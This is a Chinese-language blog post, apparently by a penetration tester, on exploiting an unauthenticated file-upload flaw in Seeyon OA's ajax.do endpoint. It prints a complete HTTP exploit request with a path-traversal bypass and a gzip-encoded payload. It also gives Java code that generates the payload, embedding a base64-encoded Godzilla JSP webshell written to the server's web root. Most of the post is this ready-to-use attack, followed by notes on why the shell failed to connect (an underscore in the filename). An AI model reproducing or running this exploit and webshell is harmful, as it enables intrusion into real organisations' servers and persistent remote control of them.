0x01

打seeyon的站用ajax.do未授权上传的时候遇见了神奇的事情，先上payload吧，下面shell的路径为/seeyon/bak0.jspx，哥斯拉默认密码和密钥。

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1

Host: xxxxx:8080

Connection: close

User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Content-Type: application/x-www-form-urlencoded

Content-Length: 8518

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%C2%B5W%C3%9B%C2%92%C2%A3%C3%88%11%7D%C2%B6%C2%BFB%C3%91%2F%C3%9D%13%C2%BB%C3%AE%01%C3%94%C2%8C%06o%C3%B8%C2%A1A%C3%A2%26%C2%89%C2%96%40%5C%1D%7E%C3%A0%C3%96%C2%80%28.%C3%93%C2%80%244%C2%B1%C3%BF%C3%AE%2C.%C2%92%C3%96%C2%B3%3D%3B%C3%9E%C2%B0%C3%B5%22%C2%84%C2%AA%C2%B22O%C3%A6%C3%89%3C%C3%B5%C3%8F%C2%AF%C3%B7%C2%AF%C3%85%5B%C3%96+w%C3%97%C2%96%C3%A1%C3%BD%C3%9F%27%C3%A4%C3%8F%C2%93%C3%B1%C2%8D%C3%A2f%C3%B8%C3%8D%7D%1DV%C3%B5%C3%BD%C3%B5%C3%B5%C3%A2T%C2%BE%C2%85U%C2%95%149%C3%BES%C2%AB%C3%9F%C2%92%3C%C2%9A%C2%94n%1DO%C3%BE1%C2%B9%7B%7C%C3%BCx%0C%3D%C2%B7%2C%C2%AB%C2%8FU%18%C2%B6E%C3%BE%C3%B1%C3%AE%C2%97%C2%BFN%C3%BA%C3%8F_%C3%B6%C3%AE%C3%81%7DL%C2%8A%C3%87%0Dl%C2%A9%C3%8D%C2%B7%C2%A4%0E%C3%9F%26%C3%A5%C3%B5%C2%99%02%03yx%C2%9C%C3%BC%C3%8E%C2%B2%07l%C3%BF%C2%A7%3B%C3%8FM%C2%89%C3%87%7DU%C2%9E%C3%AE%3E%5C%C2%ACN%06%0F%C2%AA8D%08%C2%BB%C2%B0%11%C3%8A%C2%B3%3F%2F%5B%C2%8Fb%08I%C2%8CkO%C2%A0%C3%8F%2F%19%7EG%24%C2%AE%C2%A8%12%C3%BE%C2%BC8%C2%AC%C2%A82%0E%C2%B2E%C3%A3O%C2%8Df%C2%95%29%07Oc%C2%96%3A%C3%B9%7C%C3%90%05%3Ew4%29%0A2%C2%A3%C3%B5%29t%C3%B0%C3%B6D%C2%B2%C3%96%C2%9EZi%C3%BF%C3%B4%C3%99%C3%8D%C2%95%C3%A3K%C2%A6%22%C2%9B%3A%C3%85%7E%C3%86%13%C2%AE%C3%894%C2%9B%C2%84%C3%9D%05%C2%A2%5Cz%C2%99%1F%C2%85%C3%82%C2%9A%C2%91%C3%B6%C3%8A%5E%C3%89%C3%B4%C2%A3%C2%BD%C2%8F%C3%A3%17s%7DRvR%C2%AB%08%C2%8B%C3%A4%C2%A5%C2%BD%C2%AE%C3%B3%05%C3%BE%C3%AC%C2%9F%C2%89%C2%A4%C3%BBn%C2%A5%C2%99%C3%84%2B%C2%84%C2%9F%C2%A1%C3%86i%C3%99%C3%9A%C2%99%C3%AB%C2%8Cgn%C3%89%C2%A5%C3%88%C3%86%C3%BEt%C3%BD%066K%C3%98%C2%BB%C3%B7%C2%BA%C2%B5%C2%AC-%09%C3%86S+%18%C2%8D%23%C2%AE%C2%A3-%C3%B6c%C2%AA%C2%AC%3D%C2%8AO%1DK%C2%9E%C3%B9%C2%A2%C2%91x%02%C3%9AK%7CT%C3%BC%C3%B6%3F%29%0A%134%C2%83X%C2%8F%C3%B0%5C%C2%84I%3A%7B%C2%B5X%C3%92%C3%8EN%C2%A5%C3%9D%C2%B2%C3%B3%C3%81%C2%B6%C2%BA%14d%1Al%7B%C2%96%C3%86%C3%AEm%C2%BC%3E3%C2%88%C3%80%C2%92%1BITH_0%C3%9A%15%C3%84%C3%AE%60%3Fu%C2%A5%C2%B2-%C3%A5%C2%BC%14%C2%94d%C3%85%3D%1FW%1C%5EOW%C2%8EI%C3%A7%C2%81%10%C2%95%2FS%22%C2%BA%C2%B1%C2%9F%C2%84%C2%96%C2%8AL%C2%92%C2%88B.%C2%BE%3C%C3%BB%C3%AD%29%C2%81%C3%BC%C3%80%1E%C2%BE%C2%91%04%C2%A2%0C%5B%C2%96%C3%B0s4s3%C2%9E%C2%B2%C2%AD%C2%A8%C2%B1%C2%A72%C3%AD%C2%8B%C3%AAa%C2%95*%C2%A5%2F%C3%84%C3%88O%C3%98%C3%BD%C3%86%C3%849%C3%A3%C2%9F+_mh%C2%B1%C2%84%C3%97%C3%92s%C3%97b%0B%C2%88%C2%A9q%28%C2%83%C3%90L%C3%BA%1C%08%7CcSz%21%C2%A5%3C%C2%AF%C2%B7R%C3%B9B%C2%AD%1B%C3%97%C2%A4%C3%8B%C2%80%C2%8B%C3%AB%C3%8Dy%C3%B1i%C2%9D%C2%9C%1A%C3%87%C3%B2%C2%A3o%C3%8E%C2%81%C3%9C%3A%C3%A6%C2%BA%C3%91%29c%C2%8F%C3%A3%C3%96%28%C2%83%C3%96%C2%A7%2C%C2%B2%C3%9B%C3%B8%C3%89n%C3%A9%C3%9C%C2%B1T%0E%C3%BB%C3%AE%C2%B7Q%C2%B9%C3%A2dV5%C3%96%C3%89RK%C2%AF%18%09%C3%AB%C3%86%11%18%01%C3%8E%C2%8A%3D.%3E%2FwU%C3%B4j*q+%28%C2%85%C3%84%C3%85%7C%28%28%08%C3%8E%29%3D%C3%AA%29r%C2%B4%1Bl%05%C2%9A%C3%B4%C2%84%C3%A3L%12IF%12%2F%C2%98%C3%A18%C2%A0%C2%BE%C3%96%C2%91%3EU%5B%C2%B0%C2%99K%02%C2%99*Z%7C%C2%AD%C2%A16%C2%8DB%C3%B2R7%C2%ADcm%C2%A3%C2%8D%C3%866%C2%81y%C2%AA%5E%60O%C2%A8%C2%B1%3D%C2%96%1A%7DvL%C3%88_%C2%86%C2%88P%C2%A3%15%07%C3%B2f%C2%9B%01R%05%041%29%04%60%3F%C3%B3%C2%B4gF%12%06%3E%40%C3%BC%C3%A0W%19%C2%88i%C2%B33%C2%8D%C2%B3O%01%1Ft%C2%B5%04%7C%C3%8F%01%C3%97%C3%A1+%7B%C2%B9B%C3%98%26%C2%BDw%C2%B4%28%C3%99%C3%A9%5BR%C2%82z%C3%B24%1AjD%C2%85x%C3%B5%C3%82%C3%BF%06%C2%AF%C2%AEF%C3%8E%C2%AB%C3%AC%C2%84%C2%BC%2C+%5C.*%C2%97%C2%BB%C3%BA%C3%A2%C3%B3%25%1F%1A%5D%C3%9B%C2%96Z%C2%ACR%C2%B9t%08%C3%94%40-%C3%A6%C2%B8%5E%C3%97%C3%9A1%02%C3%BB%C2%A9%0B%7E%C3%BB%C3%93m%01%C2%B8%C3%83%7F%C3%8C%C2%88E%C2%B1%C3%9E%C3%99%C3%A5*W%0F%C2%86%C3%85B%7D%C3%8Bs%C2%A8M%C2%B4%C3%A4%C2%A0%C3%86q%1D%5B%C3%AA%C3%9E%C3%A5%C2%9E%0B%C3%95%C2%8A%C3%B7%0E%C3%94%0C%C3%A6%C2%AC%24%C3%A8%C2%A5%24%C3%96%C3%8C%C2%B5%C2%BEe%14%C3%8C%21_%1A%7B%0CL%C2%B9%C3%82%C2%B8%C3%BBS%1C%0B%C3%A6%C3%92%05%C3%A3%04%C3%9BU%C3%B6*%C3%AFA%C2%BFp+N%3BG%C2%84c%C3%94%C2%81%24%C3%88%C3%A7%C2%A5%06%C2%B6E%C3%B9%10L%C3%97%C3%91o%C3%8E%12%C3%AB%C2%91_%C3%83%C3%BE%C3%AD%C3%AC%C2%92S%C3%91%C2%89%3D%C3%91%40%C3%92%C2%9C%C2%88%C2%BC%C3%9C%C2%A8%C2%BCy%0D%1C%C2%80%C2%BCRr%C3%ACS%3A%C2%A5%C3%8C%C3%89a%2F%C2%9DyS%C3%B9%C3%856I%C2%88K%C3%BEb%5BN%C2%BC%C3%8A%0D%C2%B0%7Fl%C2%B6%19%7Fvv6%C2%81s%C2%B0%C2%A3%C3%A4%2F%C2%90kBZ%18%C3%80%01%C2%A6%C3%A3%3D%C3%A0%3B%C2%9E%C3%9Bq%04rJ%C2%B8%02%C2%93%C2%82%1D%C2%9C%C2%A3%21%16%C2%A3%C2%95%C2%92c%C3%AF%03%C2%97b%C2%BEP%1EU%23%C3%A8%07%C2%BD%1F%C3%9C%C3%A5%C2%BF%19%C3%B0%C2%AF%0AL%1D%C3%AC%3E%17c%1CK%C3%BDr%5EwF%C3%9F%7B%C3%96%C2%90%C2%A7%C2%AE%0E%C2%A0%C3%A6%C3%94%C3%82%C2%A3%C2%B6%C2%85%C2%94%0D%C3%AB%0C%C3%B5p%C3%81%00%C2%9F%C2%9B%19Si%C3%91%C3%B7%C2%94%C2%AEO%5C%7BFc%C3%B7%C2%B6+77%7E%5D%C3%A3%C2%AB%C2%80%3F%28h%C3%99%C2%8D%C2%9D%C2%95%C3%88%C2%9E%C2%AA%C2%B8w%C3%8Dp%3E%24%C2%91%C3%A8%C3%BA%C2%90M%C3%B1%C2%84ME%11%C3%ACy%C2%B2%29%C3%A3%089%3Dx%09%C2%8B+_3%C2%A8%1FZ%12%C2%AB%C3%88%1E0%C3%9C%0C%7Dm%C2%959%07%3F%05%1E%C2%9B%C3%90Gr%C2%85%C3%B4%12%C2%BAv-e%0Fu%C3%89%C3%AA%04%C3%A0q%3D%3F%C3%81%3C%C3%BF%23%C3%9Cq%7C%C2%B7%C2%BD%09%C3%AF%C3%B9%C2%9F%C3%A0%C2%A8%5D%C3%A2%C3%AF%C3%AB%C2%84%C2%84Z%C3%84%C3%B1%0Cu%09%7D%C2%B2%C2%8B%07c%C2%B1%C2%82%1A%0E2%C3%A6%C3%8D%C3%91%C3%A2K%C3%8E%C2%81%C2%93%1D%C3%B7F%C3%BFG%C3%AC%C2%A1V%19%C3%A0%27%C3%B4%C2%84w%C3%BA%C3%97N%C3%AA%C3%B8%C3%B3j%01oD%C2%A3%05%3C%29%C3%9B%3C%C2%91%C3%8E%C3%AE%1D%0E%5D%C3%A7%C3%8A%C3%88%C2%A1%05%C2%9C%C3%97q%C3%A8%C3%9A%C3%9F%C3%BE%3B%0E%5D%C2%B8%C3%B7%C3%BF%C3%A2%C2%90%C2%80%C3%A7%C3%BC%0Fqh%C2%88%C3%A5%C3%8Fqh%C2%8Cci%5E%C3%8E%C3%BB%C2%83%C3%9C%0F%C3%AB%C3%9E%C3%89%C3%BD%C2%88%C3%A7%3B%C2%B9OG_%C3%BFt%C3%AE5%C3%80v%C2%98%2F%C2%92%C3%B0%5D%C2%8C%C3%8F%C2%81%C3%B9%C3%94x%26%3A%C3%83%C3%BC%C3%A4%C2%B6%C2%86%C3%82_%C3%B3%C2%8E%C2%B1Jg%C3%92%C2%82I%C3%9C%0C%C3%A6%0D%C3%87%5E%C3%BC%C3%82y%1C%C3%B9%C2%B8%C3%8A+%3E%C2%98%03%C2%B8%C2%8E%C2%A0f%C2%BB%C2%9E%7E%C2%9B%C3%AF%C2%AB%5EA%C3%97%C2%B8%C2%B2%00%05C%2F%C2%81%C3%B5%C3%BF%C2%99%C2%AFq%1D%17%C2%98N%C2%86%C3%B9%3B%C3%A20%C3%A8%C2%A5%C2%BE%7F%5Cz%3E%3D%C3%AA.%06%C3%B2Pz%C2%B9sp%C2%81%C2%BF%C2%B0%7F%C3%AFQ0%C3%9B.%C2%BDk%C2%88%C2%83%1F%C3%B9%C3%97%C3%B5%C2%AB%C3%AF%C3%8D%C2%9F%16%C3%B7%C2%9FW%C2%8B%C2%84%19%C2%A8%C3%82l%7E%1A%C3%BB%01%C3%84G%7C%06m%C2%8A%C3%B5%2B%C3%B6%15%C3%A2%C2%90%C3%A3%C2%AEg%C2%8D%C3%BA3W%40%C2%9F+%C3%A8c%27%C2%98Yt%C2%A7%C2%99%C2%AEs%08%C3%B3m%C3%81%C2%8C%C3%B8%C2%A9%C2%83%C2%9FK%C2%98o%C2%BEe%C3%A0%C3%99%C3%99%C3%A1%01%1A%C2%B7%C3%859%02%C3%AC%C3%9AAg%C3%A2y%C2%9C%C2%82%C2%AF%C3%B1%C3%86%C2%8A+%3E%C3%A8%C2%990s%1D%C3%B0%09%C3%B2%0B%1A%0AeP%07g%C2%AC%1D%C2%B0%C3%BF%3D%C3%86%3C%C2%81%C3%A7%C2%AF%0D%1C%C3%82%3A%00%C2%B4%2C%C3%AD%09L%C3%ACpR%C2%B9%C3%99%C2%91%C2%9D%0EYZ%C3%B5uO%C2%AE%7CoO%C3%95%C3%A1%08%C2%BA5%10%C3%A2r%C3%90%0FCM%C2%81%7E%C2%B8%C3%89%C3%A9%0E%C2%AF%C3%87%7Esi%C2%B9B%C2%8B%C3%81%C3%97%14z%3D%C2%89%3CQA%C3%A1%C3%B4%1A%C2%AB%C2%8Fyd%C2%A98%C2%97I%00%C3%B3%04%C3%B2%7F%C3%84xzP%0F%C2%A0%13%C3%8ERr%C3%AAb%C2%86%C3%98%C3%BB%7E%C2%90%21%C3%90%C2%9B%5DM%C2%B1%7E.%C3%87%C2%A1%C3%8E%C2%90%01h%C2%B2%C2%A0%C2%AB%07%23%C3%B64%C3%80*%C2%977%C2%81%C2%B5e%3A%7F%07%C3%8D%C3%A4%C2%9A%C2%9F%C2%9B-%C3%8E%C2%81%C3%8E%C2%B7p%2F%C2%A0wS%C2%83%00-N%60.%C2%82%C2%BE%C2%ADq%C3%9D%5E%C3%BB%C2%8A%C3%8D%2C%C2%B9x%C2%88%0D%C3%BD0%C2%A6P%7FP%C2%A7%C3%81%C2%AD%C3%B6%C2%82%C2%BC%C3%98%C3%B0%C2%8E%27%C2%A1%C3%B7%C2%82%16%C2%87%C2%B3S%C3%B0%17%C3%8Er%12%1Ac%00%3CY%17%3E%C2%BE%C3%8F%C3%A8p%C2%BF%C3%89U%14%C2%8A%5B%C3%80%09%C3%B0%C2%99%C2%B2%C3%B0%5BA%C3%9D%C2%99%7C%C3%90%C2%BAX%C2%A7%25%C2%80s%C3%9E%3F%2F%3B%C2%AD%09%C3%B3%C3%8A%04%0E%C2%8F%1A%C2%8B%3B%C2%9E%C2%94%24%C3%AD%C3%8E%C2%BC%C3%95%5E%C2%BD%C2%8ES%C2%8E%1E%05%3A%C2%B3%C3%AFU%16%C3%96%C2%9AX%C2%B7%C2%81%C3%8F%C3%93%C3%AEY%C2%8B%C2%BF%C3%91Np%17%18%C2%B1%C3%84%C3%B6%3A%C2%AD%C2%B8%C2%B5%C3%A4%C3%96%C2%B6R%C3%98w%C2%8C%C3%80%3E%09%C2%BD%C2%A6%C3%BCA%C3%BB%C3%B8%C3%9E%C2%84%C3%AFr%C2%89%3F%C3%8E%C3%92%C3%B9%C2%82Z%C3%B6%1Cd%C3%9E%C3%95%00V%C3%8Dl8%C3%A6%C2%8B%3F%7D%C3%BE%C3%A4S%0A%C3%84%0Ew%0A%C3%81+6%C3%BB%C3%A3%C2%A1%C3%A7%C2%9A%7C%C3%B0%C2%A6%C3%9B%C2%9F%C2%AE%17%C3%98I%C3%95%C3%A4%C2%8FYR%C3%B9%C2%8F%C3%AC%C2%B3%C2%B6%C3%B8%C3%B44%0F%C3%BD%22%C2%80%3Bl0%7C%C3%B7%C3%97%C3%97%C3%9F_%C3%B4%C3%B0%C3%AD%C2%8D%C2%B5%C3%9F6%C3%BC%C3%A8%C3%B7%C3%B6%3F%1E%06%C2%83%C2%8F%C3%BD7%C3%9B%C2%BC%C2%BE%C2%82%C2%81%C3%AE%C2%82%C3%BB%C3%A1%C3%A7%3B%7D%C3%87%C3%BF%C3%AD%C3%B3%C3%AD%05%C3%B8%C3%B6%0A%C3%BD%C3%98%C3%BD%40%C3%B9%C3%83%C2%AD%C3%B1%C3%B7%C3%96%C3%BA%C2%A8%C2%A8Bp%C3%AC%C3%97_%C3%B0%15%1F%1E%C2%82%C3%B0uR%C3%95n%C2%9D%C3%B8%C2%93%C3%93%C3%A9%C3%B4%C3%B0%C3%A1%C3%AB%C3%BD%C2%AFp%C3%AF%C2%87%C2%BB%C3%BFW%C3%BC%5D%C2%BF5%C3%A1%C3%BD%C2%BF%C3%BE%0D%C2%B1%2BF%C3%B12%10%00%00

其中shell的内容和路径是由arguments参数控制，由gzip编码，具体生成如下

import java.io.ByteArrayOutputStream;

import java.io.IOException;

import java.net.URLEncoder;

import java.util.zip.GZIPOutputStream;

public class gzip

{

public static String compress(String str)

throws IOException

{

if ((str == null) || (str.length() == 0)) {

return str;

}

ByteArrayOutputStream out = new ByteArrayOutputStream();

GZIPOutputStream gzip = new GZIPOutputStream(out);

gzip.write(str.getBytes());

gzip.close();

return out.toString("ISO-8859-1");

}

public static String compress2URI(String strData)

throws IOException

{

String encodeGzip = compress(strData);

String jsUriStr = URLEncoder.encode(encodeGzip, "UTF-8");

return jsUriStr;

}

public static void main(String[] args) throws ClassNotFoundException {

//shell是base84编码后的；文件名为bak0.jspx；需要其他的shell和文件请自行修改；

String poc = "[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = \"../webapps/seeyon/\";\n" +

" \tjava.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+\"bak0.jspx\");\n" +

" String shell = \"PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgdmVyc2lvbj0iMS4yIj48anNwOmRlY2xhcmF0aW9uPiBTdHJpbmcgeGM9IjNjNmUwYjhhOWMxNTIyNGEiOyBTdHJpbmcgcGFzcz0icGFzcyI7IFN0cmluZyBtZDU9bWQ1KHBhc3MreGMpOyBjbGFzcyBYIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7cHVibGljIFgoQ2xhc3NMb2FkZXIgeil7c3VwZXIoeik7fXB1YmxpYyBDbGFzcyBRKGJ5dGVbXSBjYil7cmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGNiLCAwLCBjYi5sZW5ndGgpO30gfXB1YmxpYyBieXRlW10geChieXRlW10gcyxib29sZWFuIG0peyB0cnl7amF2YXguY3J5cHRvLkNpcGhlciBjPWphdmF4LmNyeXB0by5DaXBoZXIuZ2V0SW5zdGFuY2UoIkFFUyIpO2MuaW5pdChtPzE6MixuZXcgamF2YXguY3J5cHRvLnNwZWMuU2VjcmV0S2V5U3BlYyh4Yy5nZXRCeXRlcygpLCJBRVMiKSk7cmV0dXJuIGMuZG9GaW5hbChzKTsgfWNhdGNoIChFeGNlcHRpb24gZSl7cmV0dXJuIG51bGw7IH19IHB1YmxpYyBzdGF0aWMgU3RyaW5nIG1kNShTdHJpbmcgcykge1N0cmluZyByZXQgPSBudWxsO3RyeSB7amF2YS5zZWN1cml0eS5NZXNzYWdlRGlnZXN0IG07bSA9IGphdmEuc2VjdXJpdHkuTWVzc2FnZURpZ2VzdC5nZXRJbnN0YW5jZSgiTUQ1Iik7bS51cGRhdGUocy5nZXRCeXRlcygpLCAwLCBzLmxlbmd0aCgpKTtyZXQgPSBuZXcgamF2YS5tYXRoLkJpZ0ludGVnZXIoMSwgbS5kaWdlc3QoKSkudG9TdHJpbmcoMTYpLnRvVXBwZXJDYXNlKCk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt9cmV0dXJuIHJldDsgfSBwdWJsaWMgc3RhdGljIFN0cmluZyBiYXNlNjRFbmNvZGUoYnl0ZVtdIGJzKSB0aHJvd3MgRXhjZXB0aW9uIHtDbGFzcyBiYXNlNjQ7U3RyaW5nIHZhbHVlID0gbnVsbDt0cnkge2Jhc2U2ND1DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7T2JqZWN0IEVuY29kZXIgPSBiYXNlNjQuZ2V0TWV0aG9kKCJnZXRFbmNvZGVyIiwgbnVsbCkuaW52b2tlKGJhc2U2NCwgbnVsbCk7dmFsdWUgPSAoU3RyaW5nKUVuY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImVuY29kZVRvU3RyaW5nIiwgbmV3IENsYXNzW10geyBieXRlW10uY2xhc3MgfSkuaW52b2tlKEVuY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7dHJ5IHsgYmFzZTY0PUNsYXNzLmZvck5hbWUoInN1bi5taXNjLkJBU0U2NEVuY29kZXIiKTsgT2JqZWN0IEVuY29kZXIgPSBiYXNlNjQubmV3SW5zdGFuY2UoKTsgdmFsdWUgPSAoU3RyaW5nKUVuY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImVuY29kZSIsIG5ldyBDbGFzc1tdIHsgYnl0ZVtdLmNsYXNzIH0pLmludm9rZShFbmNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZTIpIHt9fXJldHVybiB2YWx1ZTsgfSBwdWJsaWMgc3RhdGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIGJzKSB0aHJvd3MgRXhjZXB0aW9uIHtDbGFzcyBiYXNlNjQ7Ynl0ZVtdIHZhbHVlID0gbnVsbDt0cnkge2Jhc2U2ND1DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7T2JqZWN0IGRlY29kZXIgPSBiYXNlNjQuZ2V0TWV0aG9kKCJnZXREZWNvZGVyIiwgbnVsbCkuaW52b2tlKGJhc2U2NCwgbnVsbCk7dmFsdWUgPSAoYnl0ZVtdKWRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIG5ldyBDbGFzc1tdIHsgU3RyaW5nLmNsYXNzIH0pLmludm9rZShkZWNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZSkge3RyeSB7IGJhc2U2ND1DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIik7IE9iamVjdCBkZWNvZGVyID0gYmFzZTY0Lm5ld0luc3RhbmNlKCk7IHZhbHVlID0gKGJ5dGVbXSlkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBuZXcgQ2xhc3NbXSB7IFN0cmluZy5jbGFzcyB9KS5pbnZva2UoZGVjb2RlciwgbmV3IE9iamVjdFtdIHsgYnMgfSk7fSBjYXRjaCAoRXhjZXB0aW9uIGUyKSB7fX1yZXR1cm4gdmFsdWU7IH08L2pzcDpkZWNsYXJhdGlvbj48anNwOnNjcmlwdGxldD50cnl7Ynl0ZVtdIGRhdGE9YmFzZTY0RGVjb2RlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKHBhc3MpKTtkYXRhPXgoZGF0YSwgZmFsc2UpO2lmIChzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpPT1udWxsKXtzZXNzaW9uLnNldEF0dHJpYnV0ZSgicGF5bG9hZCIsbmV3IFgodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLlEoZGF0YSkpO31lbHNle3JlcXVlc3Quc2V0QXR0cmlidXRlKCJwYXJhbWV0ZXJzIixkYXRhKTtqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSBhcnJPdXQ9bmV3IGphdmEuaW8uQnl0ZUFycmF5T3V0cHV0U3RyZWFtKCk7T2JqZWN0IGY9KChDbGFzcylzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpKS5uZXdJbnN0YW5jZSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO3Jlc3BvbnNlLmdldFdyaXRlcigpLndyaXRlKG1kNS5zdWJzdHJpbmcoMCwxNikpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShiYXNlNjRFbmNvZGUoeChhcnJPdXQudG9CeXRlQXJyYXkoKSwgdHJ1ZSkpKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShtZDUuc3Vic3RyaW5nKDE2KSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9PC9qc3A6c2NyaXB0bGV0PjwvanNwOnJvb3Q+\";\n" +

" sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();\n" +

" String decodeString = new String(decoder.decodeBuffer(shell),\"UTF-8\");\n" +

" printWriter2.println(decodeString);\n" +

" printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']";

try {

String poc_encode = gzip.compress2URI(poc);

System.out.println(poc_encode);

} catch (IOException e) {

e.printStackTrace();

}

}

}

0x02

接下来用生成好的payload直接打，然后发现上传文件的时候shell上传上去了但是访问报错，一直连不上。

image.png

正常情况的访问哥斯拉的应该不会报错，冰蝎的话是java.lang.NULL啥的。

0x03

接下来就是漫长的找问题环节。

一开始先把后缀改成txt，发现内容没问题，但是jspx解析就报错。

觉得可能是马的问题，换了冰蝎等，都不太行，还是报错。

头皮发麻，怀疑是gzip编码问题，直接找了个网上现场的payload，访问shell页面发现java.lang.NULL，成功连上去了(吐了)。

0x04

通过shell去查看之前上传后的连不了的shell，真没发现问题。不用上传了，直接把shell内容复制上去，还是报错连不上。当时到了这已经觉得非常离谱了。

最后发现是文件名问题。。。如下两个文件一模一样，带下划线的访问如上面那张图，不带下划线的成功连上如下。

image.png

image.png

估计是文件名带下划线解析时处理逻辑有点不同，以后再也不乱加特殊字符了